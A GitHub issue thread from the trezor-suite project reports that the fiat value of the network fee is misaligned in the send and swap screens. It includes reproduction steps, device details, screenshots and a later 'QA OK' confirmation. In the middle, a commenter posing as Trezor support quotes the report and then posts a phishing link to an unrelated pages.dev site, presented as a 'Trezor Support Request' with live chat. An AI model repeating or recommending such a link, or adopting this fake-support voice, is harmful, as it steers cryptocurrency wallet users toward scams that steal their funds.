### ISSUE TITLE
Misaligned fiat value of network fee in send and swap section

### ISSUE THREAD

**Issue by bosomt** [trezor/trezor-suite#15762]
**Describe the bug**
Misaligned fiat value of network fee in send and swap section

**Steps to reproduce:**
1. Navigate to send
2. Press send all
3. Check fee section

**Info:**
 - Suite version: web 25.1.0 (2ddabdc4261ccf0a6319e8ee871a6fb86d41da1c)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.5 regular (revision a61e783448043760a7c925e017bd08a4673a61c8)
 - Transport: WebUsbTransport

**Screenshots:**

https://github.com/user-attachments/assets/778e6141-f3d7-45dc-893b-40e2af1e4fd9

<img width="749" alt="Screenshot 2024-12-04 at 10 38 27" src="https://github.com/user-attachments/assets/615023dd-eb60-48c6-9f76-b36b6558dac5">
<img width="785" alt="Screenshot 2024-12-04 at 10 37 46" src="https://github.com/user-attachments/assets/2ca7de15-19d0-4cdb-8328-99454721ff25">

**Comment by Hinted-tech** [comment]
> **Describe the bug** Misaligned fiat value of network fee in send and swap section
> 
> **Steps to reproduce:**
> 
> 1. Navigate to send
> 2. Press send all
> 3. Check fee section
> 
> **Info:**
> 
> * Suite version: web 25.1.0 ([2ddabdc](https://github.com/trezor/trezor-suite/commit/2ddabdc4261ccf0a6319e8ee871a6fb86d41da1c))
> * Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
> * OS: MacIntel
> * Screen: 1512x982
> * Device: Trezor T3T1 2.8.5 regular (revision a61e783448043760a7c925e017bd08a4673a61c8)
> * Transport: WebUsbTransport
> 
> **Screenshots:**
> 
>  Screen.Recording.2024-12-04.at.10.51.08.mov 
> 
> <img alt="Screenshot 2024-12-04 at 10 38 27" width="749" src="https://private-user-images.githubusercontent.com/31506317/392320649-615023dd-eb60-48c6-9f76-b36b6558dac5.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMzMDY1NzMsIm5iZiI6MTczMzMwNjI3MywicGF0aCI6Ii8zMTUwNjMxNy8zOTIzMjA2NDktNjE1MDIzZGQtZWI2MC00OGM2LTlmNzYtYjM2YjY1NThkYWM1LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjA0VDA5NTc1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWZiN2YyZWI5ZGYyMTJmNzk3MDJjZWU5MDA3ODE2YzVlMmZhNTc1ZDU5MmU1Y2JkYTQ4YzMyZjMwNjQxOWY1NWYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.RrBza7arYTQ6-xVen_g9X44abUUBLoPR7g2fsEXZOF4"> <img alt="Screenshot 2024-12-04 at 10 37 46" width="785" src="https://private-user-images.githubusercontent.com/31506317/392320651-2ca7de15-19d0-4cdb-8328-99454721ff25.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzMzMDY1NzMsIm5iZiI6MTczMzMwNjI3MywicGF0aCI6Ii8zMTUwNjMxNy8zOTIzMjA2NTEtMmNhN2RlMTUtMTlkMC00Y2RiLTgzMjgtOTk0NTQ3MjFmZjI1LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEyMDQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMjA0VDA5NTc1M1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWVkYTllY2M5ZmU4NTRlY2I5NDNjYTRjMGE2MDQxNzMyNTMyZjQ0N2RlZjU1NmNjMGJmYzc2ZDY5Y2QwMTAxNjEmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.8c-trFVa_tHwjN3yCOARo-DMNnGdjmDJanOeGnTlOVQ">

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Trezor Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by bosomt** [comment]
**QA OK**

**Info:**
 - Suite version: desktop 24.12.1 (ec8321d0d17529ca77d8916e70158cecc469f863)
 - Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) TrezorSuite/24.12.1 Chrome/128.0.6613.186 Electron/32.2.6 Safari/537.36
 - OS: MacIntel
 - Screen: 1512x982
 - Device: Trezor T3T1 2.8.6 regular (revision 17f2a3256b2631823c2bad1855fab61b27985fd2)
 - Transport: BridgeTransport 2.0.33
